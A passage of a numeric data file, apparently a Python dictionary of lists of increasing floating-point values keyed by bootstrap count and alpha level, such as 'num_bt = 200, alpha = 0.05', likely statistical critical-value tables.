0.20041528320312602, 0.20137191772461044, 0.2023287353515636, 0.20328579711914174, 0.20424304199218862, 0.20520046997070424, 0.20615814208984484, 0.20711599731445424, 0.20807409667968862, 0.2090323791503918, 0.2099908447265637, 0.21094949340820435, 0.21190838623046998, 0.2128674621582044, 0.21382678222656382, 0.21478628540039196, 0.21574591064453258, 0.21670584106445445, 0.21766589355468885, 0.21862612915039198, 0.2195866088867201, 0.22054727172851696, 0.2215081176757826, 0.22246914672851698, 0.2234304199218764, 0.2243918151855483, 0.22535345458984518, 0.2263152770996108, 0.22727722167968895, 0.22823941040039208, 0.22920178222656395, 0.23016433715820456, 0.23112707519531395, 0.23208999633789207, 0.23305310058593892, 0.2340163879394545, 0.23497985839843888, 0.23594351196289198, 0.23690734863281387, 0.2378713684082045, 0.2388355712890639, 0.23979995727539205, 0.24076452636718892, 0.24172921752929832, 0.24269415283203272, 0.24365921020507958, 0.24462451171875144, 0.24558993530273582, 0.24655554199218893, 0.24752133178711083, 0.24848730468750146, 0.24945346069336088, 0.2504197387695327, 0.25138626098632966, 0.252352905273439, 0.25331973266601715, 0.2542866821289078, 0.2552538757324234, 0.25622119140625155, 0.25718869018554846, 0.25815637207031406, 0.25912417602539217, 0.26009222412109523, 0.2610603942871108, 0.2620286865234389, 0.26299722290039207, 0.26396588134765775, 0.2649347229003921, 0.265903686523439, 0.2668728942871109, 0.2678422241210954, 0.26881167602539235, 0.269781311035158, 0.27075112915039246, 0.2717211303710956, 0.2726912536621112, 0.27366156005859565, 0.2746319885253926, 0.27560260009765825, 0.27657339477539267, 0.2775443115234396, 0.27851541137695524, 0.2794866333007834, 0.2804580383300803, 0.28142956542968967, 0.2824012756347678, 0.2833731689453147, 0.28434518432617406, 0.2853173828125022, 0.28628970336914283, 0.28726220703125216, 0.288234832763674, 0.28920764160156465, 0.29018063354492396, 0.29115368652343954, 0.29212698364258016, 0.2931004028320332, 
0.29407394409179877, 0.2950476684570331, 0.29602151489258, 0.29699554443359555, 0.2979696960449236, 0.2989440307617205, 0.2999184875488299, 0.3008930664062518, 0.3018678283691424, 0.30284277343750177, 0.3038177795410174, 0.3047930297851581, 0.30576834106445505, 0.3067438354492207, 0.3077195129394551, 0.30869531250000204, 0.3096712341308614, 0.31064733886718954, 0.3116235656738302, 0.3125999145507833, 0.31357644653320516, 0.31455310058593955, 0.3155299377441426, 0.3165068969726582, 0.31748397827148633, 0.31846124267578324, 0.3194385681152363, 0.3204161376953144, 0.3213937683105488, 0.3223715820312518, 0.32334957885742366, 0.32432763671875176, 0.32530587768554864, 0.32628424072265805, 0.32726278686523613, 0.32824145507812674, 0.3292202453613299, 0.33019915771484554, 0.33117825317383, 0.33215747070312696, 0.33313681030273634, 0.3341163330078145, 0.3350959777832052, 0.3360757446289083, 0.33705563354492396, 0.3380357055664084, 0.33901589965820533, 0.3399962158203147, 0.34097671508789285, 0.34195727539062726, 0.34293801879883035, 0.34391888427734596, 0.34489993286133036, 0.345881042480471, 0.34686233520508036, 0.3478437500000022, 0.3488253479003929, 0.3498070068359398, 0.3507888488769554, 0.3517708129882835, 0.35275289916992414, 0.3537351074218773, 0.35471749877929926, 0.3557000122070336, 0.3566826477050805, 0.35766540527343993, 0.35864828491211187, 0.3596313476562526, 0.36061453247070574, 0.3615978393554714, 0.3625812683105496, 0.3635648193359403, 0.36454849243164344, 0.36553234863281536, 0.3665163269042998, 0.3675004272460968, 0.36848464965820615, 0.36946899414062806, 0.3704534606933625, 0.3714381103515656, 0.37242288208008123, 0.3734077148437531, 0.3743927307128938, 0.37537792968750316, 0.3763631896972688, 0.37734857177734693, 0.37833413696289386, 0.37931976318359695, 0.3803055725097688, 0.3812915039062532, 0.38227755737305014, 0.3832637329101596, 0.3842500915527377, 0.3852365112304721, 0.38622311401367526, 0.3872097778320347, 0.3881966247558629, 0.38918359375000366, 
0.3901706848144568, 0.3911578979492225, 0.3921452331543007, 0.39313269042969146, 0.39412033081055087, 0.39510803222656654, 0.396095916748051, 0.397083923339848, 0.3980719909668011, 0.39906024169922305, 0.4000486145019575, 0.4010371093750045, 0.40202572631836386, 0.4030144653320358, 0.4040033874511765, 0.40499237060547344, 0.4059815368652391, 0.406970764160161, 0.40796017456055167, 0.4089496459960986, 0.40993930053711425, 0.4109290771484424, 0.4119189758300831, 0.41290899658203617, 0.4138991394043018, 0.4148894042968799, 0.4158797912597706, 0.4168703002929737, 0.4178609313964893, 0.4188516845703174, 0.4198426208496143, 0.4208336181640674, 0.42182479858398925, 0.42281604003906736, 0.42380746459961427, 0.4247989501953173, 0.42579061889648917, 0.42678240966797354, 0.42777432250977043, 0.4287662963867236, 0.42975845336914553, 0.4307507324218799, 0.43174313354492677, 0.4327356567382862, 0.4337283020019581, 0.43472106933594257, 0.43571395874023955, 0.43670697021484894, 0.4377001647949271, 0.43869342041016157, 0.43968679809570854, 0.4406802978515679, 0.4416739807128961, 0.44266772460938053, 0.44366165161133364, 0.444655639648443, 0.4456498107910212, 0.4466440429687556, 0.4476384582519587, 0.44863293457031805, 0.4496275939941462, 0.4506223144531306, 0.4516172180175837, 0.4526122436523493, 0.4536073303222712, 0.45460260009766185, 0.4555979919433649, 0.4565935058593805, 0.45758914184570865, 0.4585848999023493, 0.4595807189941462, 0.4605767211914118, 0.4615728454589899, 0.46256909179688055, 0.4635654602050836, 0.4645619506835992, 0.4655585632324273, 0.4665552978515679, 0.4675522155761772, 0.4685491943359428, 0.46954629516602087, 0.4705435180664115, 0.4715408630371145, 0.47253833007813006, 0.4735359802246144, 0.474533691406255, 0.47553152465820814, 0.47652954101563005, 0.4775276184082081, 0.4785258178710987, 0.4795242004394581, 0.48052264404297373, 0.48152127075195816, 0.48251995849609886, 0.4835188293457082, 0.48451776123047385, 0.48551687622070827, 0.4865161132812552, 
0.4875154113769583, 0.4885148925781302, 0.4895144958496146, 0.49051416015625526, 0.4915140075683646, 0.4925139770507865, 0.4935140686035209, 0.4945142822265678, 0.49551455688477086, 0.4965150146484427, 0.4975155944824271, 0.498516296386724, 0.49951712036133333, 0.5005180664062553, 0.5015191955566459, 0.5025203857421928, 0.5035216979980522, 0.5045231323242241, 0.5055246887207084, 0.5065264282226615, 0.5075282287597708, 0.5085302124023489, 0.5095322570800832, 0.5105344238281301, 0.5115367736816457, 0.5125392456054738, 0.5135417785644582, 0.5145444946289112, 0.5155473327636767, 0.5165502319335985, 0.5175533142089891, 0.5185565185546922, 0.5195598449707078, 0.520563293457036, 0.5215668640136767, 0.5225705566406299, 0.5235744323730518, 0.5245783691406299, 0.5255824279785205, 0.5265866699218799, 0.5275909729003955, 0.5285954589843799, 0.5296000061035205, 0.53060473632813, 0.531609588623052, 0.5326145019531302, 0.5336195983886772, 0.5346248168945368, 0.5356301574707087, 0.536635620117193, 0.5376412658691462, 0.5386469726562556, 0.5396528015136776, 0.5406588134765683, 0.5416648864746153, 0.5426711425781311, 0.5436775207519593, 0.5446839599609435, 0.5456905822753967, 0.5466973266601624, 0.5477042541503968, 0.5487112426757875, 0.5497183532714908, 0.5507256469726627, 0.5517330017089908, 0.5527405395507875, 0.5537481994628969, 0.5547559204101625, 0.555763824462897, 0.5567719116211002, 0.5577800598144597, 0.5587883300781316, 0.559796783447272, 0.5608052978515689, 0.5618139953613345, 0.5628228149414126, 0.5638317565918033, 0.5648408203125065, 0.5658500671386784, 0.5668593750000064, 0.5678688659668031, 0.5688784179687562, 0.569888153076178, 0.5708980102539124, 0.5719080505371156, 0.572918151855475, 0.5739284362793031, 0.5749387817382873, 0.5759493103027403, 0.5769599609375059, 0.5779707946777403, 0.5789816894531309, 0.5799927673339903, 0.581003906250006, 0.5820152282714902, 0.583026672363287, 0.5840382995605525, 0.5850499877929743, 0.586061859130865, 0.5870738525390681, 
0.5880859680175837, 0.5890982055664118, 0.5901106262207086, 0.5911231689453179, 0.5921358337402397, 0.593148620605474, 0.5941615905761771, 0.5951746215820365, 0.5961878356933645, 0.5972011718750051, 0.5982146911621143, 0.5992282714843798, 0.6002420349121141, 0.601255920410161, 0.6022699890136766, 0.6032841186523483, 0.6042984313964889, 0.6053128662109418, 0.6063274841308636, 0.6073422241210978, 0.6083570861816446, 0.609372070312504, 0.6103872375488321, 0.6114024658203164, 0.6124179382324259, 0.6134334716796915, 0.6144491882324258, 0.6154650268554726, 0.6164809875488318, 0.6174971313476599, 0.6185133972168005, 0.6195297851562537, 0.6205463562011756, 0.62156304931641, 0.622579864501957, 0.6235968627929728, 0.624613983154301, 0.6256312866210977, 0.6266486511230508, 0.627666259765629, 0.6286839294433634, 0.6297017822265666, 0.6307197570800823, 0.6317379150390666, 0.6327561950683634, 0.6337745971679728, 0.6347931823730509, 0.6358118896484416, 0.636830780029301, 0.6378497924804729, 0.6388689880371136, 0.6398882446289104, 0.6409077453613322, 0.6419273681640666, 0.6429471130371135, 0.6439670410156292, 0.6449870910644573, 0.6460072631835979, 0.6470276184082072, 0.6480481567382853, 0.6490688171386759, 0.6500895996093791, 0.6511105651855509, 0.6521317138671915, 0.6531529846191445, 0.65417437744141, 0.6551959533691444, 0.6562177124023475, 0.6572395935058631, 0.6582615966796912, 0.6592838439941443, 0.6603061523437536, 0.6613287048339879, 0.6623513183593784, 0.6633741760253941, 0.6643971557617221, 0.6654202575683626, 0.6664435424804719, 0.6674670104980499, 0.6684906005859405, 0.6695143737792998, 0.6705383300781278, 0.6715624084472683, 0.6725866699218775, 0.6736110534667993, 0.6746356201171898, 0.6756603698730491, 0.6766853027343771, 0.6777103576660176, 0.6787355957031268, 0.6797609558105485, 0.680786499023439, 0.6818122253417983, 0.6828381347656263, 0.6838641662597668, 0.6848903808593759, 0.6859167785644539, 0.6869432983398444, 0.6879700622558599, 0.6889969482421879, 
0.6900239562988285, 0.6910512084960941, 0.6920785827636722, 0.6931062011718753, 0.6941339416503908, 0.6951618652343751, 0.6961899108886719, 0.6972182006835937, 0.6982466125488281, 0.6992752075195313, 0.7003039855957032, 0.7013329467773438, 0.7023620910644531, 0.7033914184570312, 0.7044208679199219, 0.7054505615234375, 0.7064804382324218, 0.7075104370117186, 0.7085406188964841, 0.7095710449218747, 0.7106015930175779, 0.7116323242187497, 0.7126632995605465, 0.7136943969726558, 0.7147256774902339, 0.7157571411132807, 0.7167888488769525, 0.7178206787109368, 0.718852752685546, 0.7198849487304678, 0.7209173889160146, 0.7219500122070303, 0.7229828186035144, 0.7240158081054674, 0.7250489807128891, 0.7260823364257797, 0.727115875244139, 0.7281496582031232, 0.7291836242675761, 0.7302177734374978, 0.7312521057128883, 0.7322866210937476, 0.733321380615232, 0.7343563232421851, 0.735391448974607, 0.7364268188476538, 0.7374623107910131, 0.7384980468749974, 0.7395340270996068, 0.740570190429685, 0.7416065368652319, 0.7426430664062477, 0.7436798400878882, 0.7447167968749976, 0.745753997802732, 0.7467913818359352, 0.7478290100097633, 0.7488668212890602, 0.7499048156738258, 0.7509430541992165, 0.7519815368652322, 0.7530202026367164, 0.7540591125488257, 0.7550982055664038, 0.756137542724607, 0.7571770629882788, 0.7582168273925757, 0.7592568359374975, 0.7602970275878881, 0.7613374633789037, 0.7623781433105442, 0.7634190063476535, 0.7644601135253878, 0.7655014648437471, 0.7665430603027313, 0.7675848388671843, 0.7686269226074186, 0.7696691894531217, 0.7707117004394498, 0.7717543945312467, 0.7727973937988248, 0.773840637207028, 0.7748840637206998, 0.775927795410153, 0.7769717712402312, 0.7780159301757782, 0.7790603942871064, 0.7801050415039031, 0.7811499938964813, 0.7821951904296846, 0.7832406311035127, 0.7842863159179657, 0.7853322448730439, 0.7863784790039033, 0.7874248962402315, 0.7884716186523409, 0.7895186462402316, 0.790565856933591, 0.7916133728027316, 0.7926611328124972, 
0.7937091979980441, 0.7947575073242159, 0.7958060607910128, 0.7968549194335909, 0.7979040832519503, 0.7989534912109345, 0.8000032043457, 0.8010531616210906, 0.8021033630371063, 0.8031539306640595, 0.8042047424316376, 0.8052558593749971, 0.8063072814941378, 0.8073589477539035, 0.8084109191894505, 0.8094631958007787, 0.8105157775878881, 0.8115686645507788, 0.8126218566894508, 0.8136753540039038, 0.8147291564941382, 0.815783264160154, 0.8168376770019509, 0.817892395019529, 0.8189474182128885, 0.8200028076171854, 0.8210585021972635, 0.822114501953123, 0.8231708679199198, 0.8242275390624979, 0.8252845153808573, 0.8263418579101541, 0.8273995666503885, 0.8284575805664042, 0.8295158996582009, 0.8305746459960915, 0.8316336975097633, 0.8326930541992165, 0.8337528381347633, 0.8348129882812475, 0.835873443603513, 0.8369342651367161, 0.8379955139160128, 0.8390570678710908, 0.8401190490722626, 0.8411813964843721, 0.8422441101074188, 0.8433071899414032, 0.8443706970214814, 0.8454345703124971, 0.8464988098144502, 0.8475634765624972, 0.8486285705566378, 0.8496940917968722, 0.850759979248044, 0.8518262939453097, 0.8528930358886692, 0.8539602050781222, 0.8550277404785128, 0.8560957641601533, 0.8571642150878876, 0.8582331542968719, 0.8593024597167936, 0.8603722534179654, 0.8614425354003873, 0.8625132446289029, 0.8635844421386684, 0.8646560668945277, 0.8657282409667931, 0.8668008422851524, 0.8678739318847616, 0.8689475097656209, 0.8700216369628865, 0.871096252441402, 0.8721713562011676, 0.8732470092773394, 0.8743231506347614, 0.8753998413085895, 0.876477081298824, 0.8775548706054644, 0.878633148193355, 0.879712036132808, 0.8807915344238236, 0.8818715209960891, 0.8829521789550733, 0.8840333862304638, 0.8851151428222607, 0.8861975708007762, 0.8872806091308544, 0.888364257812495, 0.8894485168456981, 0.89053344726562, 0.8916189880371043, 0.8927052612304637, 0.8937921447753855, 0.8948797607421822, 0.8959679870605416, 0.8970570068359321, 0.8981466979980416, 0.899237121582026, 
0.9003282775878855, 0.9014202270507762, 0.9025129089355418, 0.9036063842773386, 0.9047005920410105, 0.90579565429687, 0.9068915710449169, 0.907988281249995, 0.9090858459472607, 0.9101842651367139, 0.9112835388183546, 0.9123837890624952, 0.9134848937988234, 0.9145869750976514, 0.9156899719238232, 0.9167939453124949, 0.917898956298823, 0.9190049438476511, 0.9201119689941354, 0.9212200317382758, 0.9223292541503852, 0.9234395141601509, 0.9245509338378853, 0.9256635131835885, 0.9267772521972604, 0.9278922729492135, 0.9290085144042916, 0.9301259765624946, 0.9312448425292913, 0.9323649902343693, 0.933486541748041, 0.9346094970703066, 0.9357339172363223, 0.936859863281244, 0.9379873962402282, 0.9391164550781187, 0.940247161865228, 0.9413795776367123, 0.942513763427728, 0.9436497192382748, 0.9447875671386655, 0.9459273071288999, 0.9470690612792906, 0.9482128906249937, 0.9493588562011657, 0.9505070800781187, 0.9516576232910093, 0.9528105468749936, 0.9539660339355404, 0.9551240844726497, 0.9562849426269465, 0.9574486083984307, 0.9586152648925711, 0.9597850952148367, 0.960958282470696, 0.9621348876953054, 0.9633151550292897, 0.9644993896484303, 0.9656876525878834, 0.9668803100585867, 0.968077667236321, 0.9692799682617116, 0.9704875793456958, 0.9717009887695238, 0.9729205017089769, 0.9741467285156175, 0.9753802795410081, 0.9766218261718677, 0.9778722229003832, 0.9791323242187425, 0.9804033508300707, 0.9816867675781177, 0.982984222412102, 0.9842979736328051, 0.9856308288574146, 0.9869865722656176, 0.9883705139160083, 0.989790344238274, 0.9912579650878833, 0.9927941894531177, 0.9944410705566334, 0.996317932128899], 'num_bt = 200, alpha = 0.1': [0.0005266952514648437, 0.0026622009277343754, 0.005522804260253907, 0.008751449584960939, 0.012211112976074221, 0.015833129882812498, 0.01957775115966797, 0.023419113159179696, 0.02733966827392579, 0.031326751708984385, 0.03537067413330079, 0.03946403503417971, 0.04360103607177738, 0.047776947021484405, 0.05198780059814457, 
0.05623039245605472, 0.060501899719238306, 0.06480010986328127, 0.06912288665771488, 0.07346855163574223, 0.07783550262451176, 0.08222236633300783, 0.08662792205810552, 0.09105125427246098, 0.09549121856689458, 0.09994697570800787, 0.10441783905029303, 0.10890296936035163, 0.11340183258056649, 0.11791374206542979, 0.12243816375732434, 0.12697463989257826, 0.13152271270751967, 0.1360819244384767, 0.14065181732177745, 0.14523216247558604, 0.14982250213623055, 0.15442260742187514, 0.15903209686279313, 0.1636506652832033, 0.168278160095215, 0.17291435241699235, 0.17755886077880872, 0.18221160888671892, 0.1868722915649416, 0.19154083251953144, 0.19621692657470724, 0.20090049743652366, 0.20559139251709008, 0.21028930664062526, 0.21499423980712914, 0.2197060394287112, 0.2244245529174807, 0.2291496276855471, 0.23388118743896508, 0.2386191558837893, 0.24336330413818386, 0.2481136322021487, 0.2528699874877932, 0.25763236999511746, 0.26240062713623075, 0.26717460632324247, 0.27195438385009796, 0.27673973083496123, 0.2815306472778324, 0.2863271331787113, 0.2911289596557621, 0.2959362792968754, 0.30074878692626994, 0.30556663513183635, 0.31038967132568407, 0.3152178192138677, 0.32005115509033255, 0.32488945007324277, 0.3297328567504889, 0.33458114624023505, 0.33943439483642646, 0.3442926025390632, 0.34915561676025453, 0.35402343750000065, 0.35889614105224676, 0.36377349853515695, 0.36865566253662174, 0.37354255676269593, 0.37843410491943424, 0.38333030700683657, 0.3882311630249029, 0.39313659667968803, 0.39804668426513723, 0.40296134948730516, 0.4078805923461919, 0.41280441284179736, 0.4177328109741217, 0.42266563415527403, 0.4276031112670905, 0.4325450134277351, 0.4374914169311531, 0.4424423980712899, 0.44739788055420004, 0.45235778808593835, 0.45732227325439534, 0.4622911834716805, 0.46726467132568444, 0.47224258422851645, 0.4772250747680672, 0.48221199035644613, 0.48720348358154386, 0.492199478149415, 0.49720005035400483, 0.5022051239013681, 0.5072147750854501, 
0.5122290039062509, 0.5172478103637705, 0.5222712707519543, 0.5272993087768567, 0.5323320007324233, 0.5373693466186538, 0.5424113464355484, 0.5474580764770525, 0.5525096130371112, 0.5575658798217793, 0.5626268768310567, 0.567692756652834, 0.5727635192871114, 0.5778391647338887, 0.5829196929931661, 0.5880052566528342, 0.5930957794189475, 0.5981914138793967, 0.6032921600341818, 0.6083980178833028, 0.6135090637207052, 0.6186254501342794, 0.6237471008300801, 0.6288740921020528, 0.634006576538088, 0.6391444778442403, 0.6442880249023457, 0.6494372177124044, 0.6545920562744161, 0.6597527694702168, 0.6649192810058613, 0.6700918197631853, 0.6752703857421893, 0.6804551315307634, 0.6856461334228532, 0.690843467712404, 0.6960472869873062, 0.7012576675415054, 0.7064747619628922, 0.711698722839357, 0.7169297027587906, 0.7221677780151383, 0.7274131011962908, 0.7326659011840839, 0.7379263305664081, 0.7431945419311543, 0.7484706878662131, 0.7537550735473655, 0.7590478515625023, 0.7643492507934593, 0.7696595764160179, 0.7749789810180687, 0.7803078460693382, 0.7856464004516623, 0.7909950256347678, 0.7963540267944358, 0.8017237854003927, 0.80710460662842, 0.8124971008300801, 0.8179015731811543, 0.823318634033205, 0.8287487411499042, 0.8341925048828143, 0.8396506118774432, 0.845123825073244, 0.8506128311157246, 0.8561184692382833, 0.8616418838500997, 0.8671839904785177, 0.8727460861206076, 0.8783294677734395, 0.8839356613159199, 0.8895665740966816, 0.8952240371704121, 0.9009105682373066, 0.9066288375854512, 0.9123821258544944, 0.9181743240356468, 0.9240102386474631, 0.9298956680297872, 0.9358380889892599, 0.9418471908569359, 0.9479356384277366, 0.9541212844848657, 0.9604301452636743, 0.9669025039672876, 0.9736086273193385, 0.9806913375854518, 0.9885530853271509], 'num_bt = 200, alpha = 0.05': [0.00025646209716796877, 0.0017797088623046878, 0.004100608825683594, 0.0068597412109375, 0.009901237487792966, 0.013143997192382809, 0.016539649963378908, 0.0200567626953125, 
0.023673591613769536, 0.027374267578125014, 0.031146888732910168, 0.03498214721679687, 0.03887271881103515, 0.04281265258789061, 0.046796989440917945, 0.0508216857910156, 0.054883308410644496, 0.05897872924804685, 0.06310550689697261, 0.06726142883300776, 0.07144443511962884, 0.0756529235839843, 0.07988521575927726, 0.08414009094238271, 0.08841632843017569, 0.09271270751953116, 0.09702823638916008, 0.101362075805664, 0.10571338653564448, 0.11008140563964841, 0.11446544647216796, 0.11886489868164063, 0.1232790756225586, 0.12770744323730468, 0.13214962005615233, 0.13660499572753904, 0.14107326507568357, 0.14555389404296878, 0.15004657745361333, 0.154551010131836, 0.15906673431396487, 0.16359352111816405, 0.16813098907470705, 0.17267898559570313, 0.1772372055053711, 0.1818053436279297, 0.18638324737548825, 0.19097068786621088, 0.19556743621826167, 0.20017326354980466, 0.2047880172729492, 0.20941154479980467, 0.21404361724853516, 0.2186841583251953, 0.2233330154418945, 0.22798995971679686, 0.23265491485595705, 0.23732772827148438, 0.2420083236694336, 0.24669654846191408, 0.25139225006103516, 0.25609542846679695, 0.2608059310913086, 0.26552360534667974, 0.2702483749389649, 0.27498023986816417, 0.27971904754638677, 0.28446472167968756, 0.28921718597412116, 0.29397636413574224, 0.29874225616455086, 0.30351470947265635, 0.3082937240600586, 0.3130792236328125, 0.3178710556030273, 0.3226693725585936, 0.3274739456176757, 0.3322847747802734, 0.33710178375244143, 0.341925048828125, 0.3467544174194337, 0.3515898895263674, 0.356431465148926, 0.3612790679931643, 0.36613262176513695, 0.37099212646484403, 0.37585765838623075, 0.3807290649414065, 0.38560634613037126, 0.3904895782470705, 0.3953786087036135, 0.4002734375000002, 0.40517414093017595, 0.4100806427001955, 0.4149929428100588, 0.41991104125976586, 0.42483486175537133, 0.4297644805908206, 0.4346998977661136, 0.43964103698730506, 0.44458789825439493, 0.4495405578613286, 0.45449901580810603, 0.4594631958007818, 
0.4644331741333013, 0.4694088745117193, 0.4743904495239264, 0.4793777465820319, 0.48437084197998115, 0.4893698120117194, 0.4943745803833015, 0.49938522338867264, 0.5044017410278328, 0.5094241333007821, 0.5144524765014657, 0.5194866943359384, 0.5245269393920908, 0.5295732116699228, 0.5346254348754893, 0.5396837615966807, 0.5447482681274425, 0.549818801879884, 0.5548955917358409, 0.5599785614013684, 0.5650677871704115, 0.5701633453369155, 0.5752653121948257, 0.5803736877441421, 0.5854884719848648, 0.5906098937988296, 0.595737800598146, 0.6008724212646499, 0.6060138320922865, 0.6111619567871107, 0.6163170242309584, 0.6214789581298841, 0.626647987365724, 0.6318241882324231, 0.6370075607299817, 0.6421982574462901, 0.6473963546752941, 0.652602005004884, 0.6578152847290049, 0.6630363464355478, 0.6682652664184578, 0.6735021209716805, 0.678747215270997, 0.6840005493164072, 0.6892622756958018, 0.6945326232910167, 0.6998117446899426, 0.7050997924804701, 0.7103969955444349, 0.7157034301757828, 0.7210194778442398, 0.7263452148437517, 0.7316809463500995, 0.7370269012451192, 0.7423833084106466, 0.7477504730224629, 0.7531287002563496, 0.7585182952880878, 0.7639195632934588, 0.7693328857421893, 0.7747586441040055, 0.7801972198486344, 0.785649147033693, 0.7911147308349626, 0.796594657897951, 0.8020893096923847, 0.8075993728637716, 0.813125457763674, 0.8186683273315452, 0.824228668212893, 0.8298072433471704, 0.8354051208496118, 0.8410232925415064, 0.8466627502441431, 0.8523247909545921, 0.858010711669924, 0.8637222671508811, 0.8694609832763693, 0.875228843688967, 0.8810282135009788, 0.8868616104125999, 0.8927320098876976, 0.8986429977417016, 0.9045986175537135, 0.9106038284301785, 0.9166648864746121, 0.922789039611819, 0.9289858245849636, 0.9352674484252956, 0.9416502380371119, 0.9481566238403347, 0.9548195648193389, 0.961690254211429, 0.9688574218750032, 0.9765015029907258, 0.9851329803466828], 'num_bt = 200, alpha = 0.025': [0.00012660980224609377, 0.0012133789062500006, 
0.0031041336059570313, 0.00547554016113281, 0.00816616058349609, 0.011087417602539059, 0.014185523986816401, 0.017424774169921872, 0.020780448913574223, 0.024234161376953132, 0.027772254943847663, 0.031383972167968746, 0.03506069183349609, 0.03879554748535156, 0.042582817077636705, 0.046417617797851536, 0.0502959060668945, 0.05421424865722652, 0.058169593811035106, 0.06215934753417964, 0.06618122100830073, 0.07023315429687496, 0.07431339263916009, 0.0784202575683593, 0.08255237579345695, 0.08670837402343741, 0.09088710784912102, 0.09508750915527336, 0.09930858612060539, 0.10354949951171868, 0.10780941009521477, 0.11208747863769523, 0.11638309478759756, 0.12069564819335926, 0.12502437591552723, 0.12936889648437494, 0.13372867584228512, 0.13810310363769526, 0.14249187469482413, 0.14689445495605458, 0.1513105392456054, 0.15573974609374996, 0.1601816940307617, 0.16463607788085938, 0.1691025161743164, 0.17358085632324222, 0.1780707168579102, 0.1825718688964844, 0.18708415985107427, 0.19160713195800783, 0.1961407852172852, 0.20068489074707038, 0.20523906707763678, 0.20980331420898446, 0.21437740325927743, 0.21896118164062506, 0.2235544204711915, 0.2281569671630861, 0.23276882171630878, 0.2373896789550783, 0.2420194625854494, 0.2466580200195314, 0.25130535125732434, 0.25596115112304696, 0.26062549591064466, 0.26529823303222666, 0.26997913360595704, 0.27466827392578125, 0.27936550140380856, 0.28407066345214843, 0.28878376007080075, 0.2935047149658203, 0.2982334518432618, 0.3029698181152345, 0.3077138137817384, 0.31246543884277356, 0.3172245407104493, 0.3219910430908204, 0.32676502227783205, 0.3315462493896485, 0.3363348007202148, 0.3411306762695312, 0.3459336471557617, 0.35074386596679696, 0.35556118011474624, 0.3603855895996096, 0.36521709442138695, 0.37005554199218776, 0.3749010848999026, 0.3797535705566409, 0.3846130752563479, 0.3894794464111331, 0.3943527603149417, 0.3992329406738284, 0.4041200637817386, 0.4090139770507816, 0.4139148330688479, 0.4188224792480471, 
0.42373706817626977, 0.4286584472656253, 0.433586692810059, 0.43852172851562543, 0.44346363067627004, 0.4484123992919927, 0.45336803436279355, 0.45833053588867245, 0.46329982757568416, 0.4682761383056646, 0.4732592391967779, 0.47824928283691465, 0.4832463455200201, 0.4882502746582037, 0.49326122283935603, 0.4982791900634771, 0.5033041000366216, 0.5083361816406258, 0.5133752822875985, 0.5184215545654305, 0.523474998474122, 0.5285356903076182, 0.5336035537719737, 0.5386787414550791, 0.5437613296508799, 0.5488512420654308, 0.5539486312866222, 0.5590534973144541, 0.5641659927368174, 0.5692860412597667, 0.5744137954711925, 0.5795494079589856, 0.584692726135255, 0.5898440551757824, 0.5950033950805675, 0.6001707458496106, 0.605346260070802, 0.6105300903320323, 0.6157223129272471, 0.6209229278564463, 0.6261321640014659, 0.6313500976562509, 0.6365768814086923, 0.6418125152587899, 0.6470573043823251, 0.6523112487792979, 0.657574577331544, 0.6628474426269542, 0.6681299209594738, 0.6734222412109387, 0.6787246322631848, 0.6840371704101575, 0.6893601608276381, 0.6946936798095718, 0.7000381088256851, 0.7053936004638688, 0.7107603836059586, 0.7161387634277359, 0.7215289688110367, 0.7269313049316422, 0.7323460769653336, 0.7377736663818375, 0.7432143020629898, 0.7486685180664077, 0.7541365432739273, 0.7596189117431658, 0.7651160049438495, 0.770628433227541, 0.7761565017700216, 0.7817009735107443, 0.7872623825073264, 0.7928412628173851, 0.7984385299682641, 0.8040547180175805, 0.8096908187866236, 0.8153476715087917, 0.8210262680053737, 0.8267276763916043, 0.8324530410766631, 0.8382038116455108, 0.843981285095218, 0.8497872161865265, 0.8556233596801788, 0.8614917755126983, 0.8673948287963897, 0.8733351135253937, 0.8793157577514681, 0.8853402709960971, 0.8914127731323276, 0.8975381469726595, 0.9037223434448278, 0.909972457885746, 0.9162973403930701, 0.922708053588871, 0.9292190170288124, 0.9358493804931678, 0.9426256179809609, 0.949586410522465, 0.9567917251586955, 0.9643453216552775, 
0.9724580764770547, 0.981724624633793], 'num_bt = 100, alpha = 0.1': [0.0010530471801757815, 0.005330657958984376, 0.011070747375488285, 0.01755897521972656, 0.024520378112792965, 0.03181716918945312, 0.039369010925292956, 0.0471240997314453, 0.0550467300415039, 0.06311126708984374, 0.07129817962646484, 0.07959266662597655, 0.08798267364501955, 0.0964585876464844, 0.10501262664794928, 0.11363807678222662, 0.12232944488525396, 0.13108200073242193, 0.13989154815673835, 0.14875457763671884, 0.15766803741455088, 0.16662918090820322, 0.1756356430053712, 0.18468521118164077, 0.19377597808837904, 0.20290626525878921, 0.21207454681396504, 0.22127944946289085, 0.23051967620849634, 0.23979415893554712, 0.24910182952880888, 0.25844184875488313, 0.2678132247924808, 0.2772153472900394, 0.28664737701416043, 0.29610877990722684, 0.30559902191162136, 0.31511749267578154, 0.32466373443603547, 0.3342373657226566, 0.3438380813598637, 0.3534654235839848, 0.363119163513184, 0.37279899597168015, 0.3825047683715824, 0.39223625183105515, 0.4019932937622075, 0.4117758178710942, 0.4215836715698247, 0.4314168548583989, 0.4412752151489262, 0.45115890502929734, 0.4610678482055669, 0.47100219726562553, 0.48096195220947324, 0.4909472656250006, 0.5009583663940438, 0.5109952545166023, 0.5210583877563484, 0.5311478424072273, 0.5412639999389655, 0.5514071655273443, 0.5615777206420904, 0.5717761230468756, 0.5820027542114266, 0.5922581481933602, 0.6025429153442392, 0.612857666015626, 0.6232031631469737, 0.6335800170898447, 0.6439892196655284, 0.654431610107423, 0.6649082565307629, 0.6754202270507825, 0.6859688186645521, 0.6965554809570325, 0.7071815872192395, 0.7178489685058607, 0.7285595321655287, 0.739315338134767, 0.7501188278198256, 0.7609728240966811, 0.7718803024292007, 0.7828448486328139, 0.7938705825805679, 0.8049623107910171, 0.8161255264282241, 0.827366867065431, 0.8386942672729505, 0.8501174163818372, 0.8616481399536144, 0.8733016204833997, 0.8850971603393565, 0.8970608520507823, 
